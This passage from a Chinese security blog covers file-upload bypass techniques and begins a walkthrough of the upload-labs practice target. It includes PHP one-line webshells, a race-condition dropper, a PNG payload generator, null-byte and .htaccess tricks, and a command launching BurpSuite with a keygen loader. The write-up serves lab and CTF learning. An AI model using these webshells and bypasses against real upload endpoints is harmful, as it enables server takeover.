class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./pass17.png'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>使用:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">zhzy@debian:~$ php payload.php file.png</span><br></pre></td></tr></table></figure>
<p>file.png 是一张普通的 png 图片~<br>最终生成 pass17.png<br>生成之后的文件同样需要配合文件包含漏洞来利用。</p>
<h2 id="2-2-1-2-针对-linux-系统绕过"><a href="#2-2-1-2-针对-linux-系统绕过" class="headerlink" title="2.2.1.2 针对 linux 系统绕过"></a>2.2.1.2 针对 linux 系统绕过</h2><p>linux 不同与 windows 有着对于文件的不同的处理方式,所以一些绕过方式在 windows 上适用但是在 linux 上并不使用,然后我们来看如果在 linux 系统上的上传点有哪些可绕过利用方式。</p>
<h2 id="2-2-1-2-1-使用其他可执行并且未限制的后缀名"><a href="#2-2-1-2-1-使用其他可执行并且未限制的后缀名" class="headerlink" title="2.2.1.2.1 使用其他可执行并且未限制的后缀名"></a>2.2.1.2.1 使用其他可执行并且未限制的后缀名</h2><p>该上传思路即为“没限制什么后缀就上传什么后缀”,可以使用之前的 burpsuite 测试后缀的方式测试可以上传哪些后缀,再构造相应马儿即可。(关于如何得知哪些后缀名可上传另参 2.2 )</p>
<h2 id="2-2-1-2-2-文件名双写绕过"><a href="#2-2-1-2-2-文件名双写绕过" class="headerlink" title="2.2.1.2.2 文件名双写绕过"></a>2.2.1.2.2 文件名双写绕过</h2><p>文件名双写在 linux 系统中仍然有效,但是大小写组合是不生效的。<br>例如这样的限制代码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br></pre></td></tr></table></figure>
<p>直接使用双写绕过就行 x.pphphp ,最后生成 x.php 文件</p>
<h2 id="2-2-1-2-3-00截断上传绕过"><a href="#2-2-1-2-3-00截断上传绕过" class="headerlink" title="2.2.1.2.3 00截断上传绕过"></a>2.2.1.2.3 00截断上传绕过</h2><blockquote>
<p><strong>00截断</strong><br>无论0x00还是%00,最终被解析后都是一个东西:chr(0)<br>chr()是一个函数,这个函数是用来返回参数所对应的字符的,也就是说,参数是一个ASCII码,返回的值是一个字符,类型为string。</p>
<p>那么chr(0)就很好理解了,对照ASCII码表可以知道,ASCII码为0-127的数字,每个数字对应一个字符,而0对应的就是NUT字符(NULL),也就是空字符,而截断的关键就是这个空字符,当一个字符串中存在空字符的时候,在被解析的时候会导致空字符后面的字符被丢弃。<br>这种情况常出现在ASP程序中,PHP 版本<5.3.4时也会有这个情况,JSP中也会出现。<br>那么就可以知道00截断的原理了,在后缀中插入一个空字符(不是空格),会导致之后的部分被丢弃,而导致绕过的发生。如:在文件1.php.jpg中插入空字符变成:1.php.0x00.jpg中,解析后就会只剩下1.php,而空字符怎么插入的呢?通常我们会用Burp抓包后,在文件名插入一个空格,然后再HEX中找到空格对应的16进制编码“20”,把它改成00(即16进制ASCII码00,对应十进制的0),就可以插入空字符了。PS:这里的空格纯粹只是一个标记符号,便于我们找到位置,其实这里是什么字符都无所谓,只不过空格比较有特异性,方便在HEX中查找位置。</p>
</blockquote>
<p>00截断在 php 环境中需要满足以下要求,二者缺一不可。</p>
<ul>
<li>php 版本小于 5.3.4</li>
<li>php的magic_quotes_gpc为OFF状态</li>
</ul>
<h2 id="2-2-1-2-4-上传-access-文件"><a href="#2-2-1-2-4-上传-access-文件" class="headerlink" title="2.2.1.2.4 上传 .access 文件"></a>2.2.1.2.4 上传 .access 文件</h2><p>另参: 2.2.1.1.8<br>同样的原理绕过方式,配合解析漏洞,在 linux 环境中仍然适用,因为此类漏洞是 php 或者中间件造成的,操作系统不可控制该漏洞。</p>
<h2 id="2-2-1-2-5-条件竞争绕过"><a href="#2-2-1-2-5-条件竞争绕过" class="headerlink" title="2.2.1.2.5 条件竞争绕过"></a>2.2.1.2.5 条件竞争绕过</h2><p>同样条件竞争造成的文件上传操作系统是不可控制的,该漏洞由 php 代码逻辑引发。<br>竞争条件原理介绍:<br>网站逻辑:</p>
<ol>
<li>网站允许上传任意文件,然后检查上传文件是否包含webshell,如果包含删除该文件。</li>
<li>网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。</li>
</ol>
<p>在删除之前访问上传的php文件,从而执行上传文件中的php代码。<br>例如:上传文件代码如下</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST["cmd"])?>'</span>);<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>先进行文件上传,后进行判断与删除。利用时间差进行webshell上传。</p>
<h2 id="2-2-1-2-6-上传图片马配合文件解析漏洞绕过"><a href="#2-2-1-2-6-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.2.1.2.6 上传图片马配合文件解析漏洞绕过"></a>2.2.1.2.6 上传图片马配合文件解析漏洞绕过</h2><p>另参:2.2.1.1.10</p>
<h2 id="2-2-2-白名单验证绕过"><a href="#2-2-2-白名单验证绕过" class="headerlink" title="2.2.2 白名单验证绕过"></a>2.2.2 白名单验证绕过</h2><blockquote>
<p><strong>黑名单 & 白名单</strong><br>这里的黑名单白名单指在上传点的限制方式,黑名单例如仅拒绝 xxx 格式上传,只要上传的内容不是 xxx 格式,文件均可以上传到服务器,对应的白名单即为仅允许上传 yyy 格式,只要不是 yyy 格式的文件全部拒绝上传。</p>
</blockquote>
<p>很显然白名单限制会比黑名单限制更为严格,黑名单只要没有限制完整即有可能上传,而白名单仅允许上传 xxx 文件,之外的一律拒绝。</p>
<p>所以相比于黑名单,白名单的绕过方式会少很多。</p>
<h2 id="2-2-2-1-上传图片马配合文件解析漏洞绕过"><a href="#2-2-2-1-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.2.2.1 上传图片马配合文件解析漏洞绕过"></a>2.2.2.1 上传图片马配合文件解析漏洞绕过</h2><p>因为后缀已经严格限制死了,所以我们只能上传符合规则的图片文件,那么我们就可以利用图片马再配合文件包含或者文件解析漏洞来绕过。</p>
<p>如何生成该类图片文件另参:2.2.1.1.10</p>
<h2 id="2-2-2-2-上传-access-文件绕过"><a href="#2-2-2-2-上传-access-文件绕过" class="headerlink" title="2.2.2.2 上传 .access 文件绕过"></a>2.2.2.2 上传 .access 文件绕过</h2><p>这里的 .access 只是一个泛例,具体包括 .htaccess 和 .user.ini 等可造成解析漏洞的文件。<br>具体利用方式另参:2.2.1.1.8</p>
<h2 id="2-3-基于文件内容验证"><a href="#2-3-基于文件内容验证" class="headerlink" title="2.3 基于文件内容验证"></a>2.3 基于文件内容验证</h2><p>该限制方式既没有黑名单也没有白名单,而是靠识别上传的文件内容,符合图片标识数据则直接通过,反之则删除或拒绝,那么想要绕过的话需要我们制作符合图片文件标识的图片马。</p>
<h2 id="2-3-1-上传图片马配合文件解析漏洞绕过"><a href="#2-3-1-上传图片马配合文件解析漏洞绕过" class="headerlink" title="2.3.1 上传图片马配合文件解析漏洞绕过"></a>2.3.1 上传图片马配合文件解析漏洞绕过</h2><p>如何制作符合图片标识的图片马另参:2.2.1.1.10</p>
]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>文件上传靶场练习</title>
<url>/2020/08/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/</url>
<content><![CDATA[<p>靶机:<a href="https://github.com/c0ny1">c0ny1</a>/<strong><a href="https://github.com/c0ny1/upload-labs">upload-labs</a></strong></p>
<h2 id="burpsuite"><a href="#burpsuite" class="headerlink" title="burpsuite"></a>burpsuite</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">java -Dfile.encoding=utf-8 -javaagent:BurpSuiteCn.jar -Xbootclasspath/p:burp-loader-keygen.jar -jar burpsuite_pro_v1.7.34.jar</span><br></pre></td></tr></table></figure>
<h2 id="靶机下载"><a href="#靶机下载" class="headerlink" title="靶机下载"></a>靶机下载</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">docker login --username=t_1485709121283_0181 registry.cn-shenzhen.aliyuncs.com</span><br><span class="line">docker pull registry.cn-shenzhen.aliyuncs.com/glan/upload-labs:latest</span><br><span class="line">docker run -d -p 80:80 upload-labs:latest</span><br></pre></td></tr></table></figure>
<h2 id="文件上传漏洞概述"><a href="#文件上传漏洞概述" class="headerlink" title="文件上传漏洞概述"></a>文件上传漏洞概述</h2><p>文件上传,顾名思义就是上传文件的功能行为,之所以会被发展为危害严重的漏洞,是程序没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。文件上传漏洞是漏洞中最为简单猖獗的利用形式,一般只要能上传获取地址,可执行文件被解析就可以获取系统WebShell。</p>
<blockquote>
<p><strong>Webshell</strong><br>webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。<br>顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。</p>
</blockquote>
<p>网站WEB应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型时,就可以上传任意文件甚至是可执行文件后门。</p>
<p>造成文件上传漏洞的原因有很多种,所以利用的方式也有很多种,下图是一些常见的绕过方式&思路:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582510679-150193-upload1.png" alt="1582510679-150193-upload1"></p>
<h2 id="Pass-1-js检查"><a href="#Pass-1-js检查" class="headerlink" title="Pass-1-js检查"></a>Pass-1-js检查</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> file = document.<span class="title function_ invoke__">getElementsByName</span>(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> <span class="title function_ invoke__">alert</span>(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//提取上传文件的类型</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.<span class="title function_ invoke__">substring</span>(file.<span class="title function_ invoke__">lastIndexOf</span>(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.<span class="title function_ invoke__">indexOf</span>(ext_name + <span class="string">"|"</span>) == -<span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> <span class="title function_ invoke__">alert</span>(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>直接上传php文件得到以下提示:</p>
<p><img src="https://freeerror.org/assets/files/2020-02-24/1582511360-668212-upload1-5.png" alt="img"></p>
<p>查看源码:可以看到源码内对上传文件的后缀进行了限制,但是限制的的方式是使用JS在前端进行限制,那么就意味着只要绕过前端JS文件类型限制的话就可以上传任意文件。</p>
<p>那么首先来构造一个 1.php 的一句话:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="number">123123</span>])<span class="meta">?></span> </span><br></pre></td></tr></table></figure>
<p>之后为了匹配JS规则我们将 1.php 修改为 1.jpg,之后上传到服务器,点击上传:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582511932-510797-upload1-0.png" alt="img"></p>
<p>因为是前端js校验,因此可以直接禁用js<br>或者用burp抓包修改文件类型(上传1.jpg修改为1.php)</p>
<p>右边burpsuite抓到数据包其实证明正确匹配上了JS的规则 1.jpg 已经绕过了JS,接下来直接在burpsuite中将 1.jpg 重名名为 1.php 点击“放包”,一句话webshell便上传到了服务器。</p>
<p>接下来使用“蚁剑”链接webshell</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582512119-157722-upload1-2.png" alt="img"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582512180-992152-upload1-3.png" alt="img"> </p>
<h2 id="Pass-2-只验证Content-type"><a href="#Pass-2-只验证Content-type" class="headerlink" title="Pass-2-只验证Content-type"></a>Pass-2-只验证Content-type</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> ((<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> . <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] </span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>通过提示可以判断出 Pass 02 没有使用 Pass 01 的文件后缀白名单,而是使用了MIME文件类型限制,查看源码证明猜想。</p>
<p><code>$_FILES['upload_file']['type']</code>获取上传文件的MIME类型,仅允许image/jpeg、image/png、image/gif类型的文件上传。<br>那么我们有两种绕过方式</p>
<ul>
<li>一是修改 request 包的 content-type 字段声明文件类型为图片然后上传php文件</li>
<li>二是直接修改文件后缀上传 jpg png gif 文件再改为php(与Pass 01 方式相同)</li>
</ul>
<p>我们将使用上述的第二种方式绕过:<br>上传 2.jpg 使用burpsuite抓包<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582513869-537193-upload2-5.png" alt="img"><br>将 2.jpg 修改为 2.php,点击放包即可上传成功:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582513941-521761-upload2-6.png" alt="img"></p>
<p>使用“蚁剑”链接该webshell:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582514013-241795-upload2-7.png" alt="img"></p>
<h2 id="Pass-3-黑名单绕过"><a href="#Pass-3-黑名单绕过" class="headerlink" title="Pass-3-黑名单绕过"></a>Pass-3-黑名单绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="title function_ invoke__">rand</span>(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>; </span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>用黑名单不允许上传<code>.asp,.aspx,.php,.jsp</code>后缀的文件,变量<code>$deny_ext</code>声明了禁止上传的文件,上传的文件将在后端基于文件后缀名进行验证。</p>
<p>测试上传大小写组合和双写均失败,最终测试发现利用 php3 php5 绕过上传成功。</p>
<p>不过在我们的测试环境中,虽然php3 or php5 可以上传成功但是却无法执行,因为我们的环境中php默认关闭了对php3 php5 … 的支持,所以我们需要手动开启<br>编辑<code>/etc/php-fpm.d/www.conf</code>找到:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">security.limit_extensions = .php .php3 .php4 .php5 .php7</span><br></pre></td></tr></table></figure>
<p>将前边的注释<code>;</code>去掉:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582520471-378019-upload3-6.png" alt="img"><br>再上传 info.php5 文件:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582520133-670385-upload3-3.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582520205-359705-upload3-5.png" alt="img"></p>
<h2 id="Pass-4-htaccess绕过"><a href="#Pass-4-htaccess绕过" class="headerlink" title="Pass-4-.htaccess绕过"></a>Pass-4-.htaccess绕过</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".ini"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>提示禁止:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf</span><br></pre></td></tr></table></figure>
<p>源码中确实对上述文件后缀禁止上传。可上传的仅有被Apache默认支持的 .htaccess 文件。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">前提条件:</span><br><span class="line">1.mod_rewrite模块开启。</span><br><span class="line">2.AllowOverride All</span><br></pre></td></tr></table></figure>
<p>因此先上传一个.htaccess文件,内容如下:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">SetHandler</span> application/x-httpd-php</span><br></pre></td></tr></table></figure>
<p>设置当前目录所有文件都使用PHP解析。只要内容符合PHP语法规范就会被当作PHP执行,不符合则会报错。接在来便可以上传图片马或者一句话。</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726002559506.png" alt="在这里插入图片描述"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726002606544.png" alt="在这里插入图片描述"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDY3NzQwOQ==,size_16,color_FFFFFF,t_70-20200726002612809.png" alt="在这里插入图片描述"></p>
<p>如果nginx环境,nginx 默认不加载该文件所以 .htaccess 并没有被加载执行。<br>可以手动修改 nginx 配置文件加载该 .htaccess 文件实现效果:</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">include</span> /var/www/.htaccess;</span><br></pre></td></tr></table></figure>
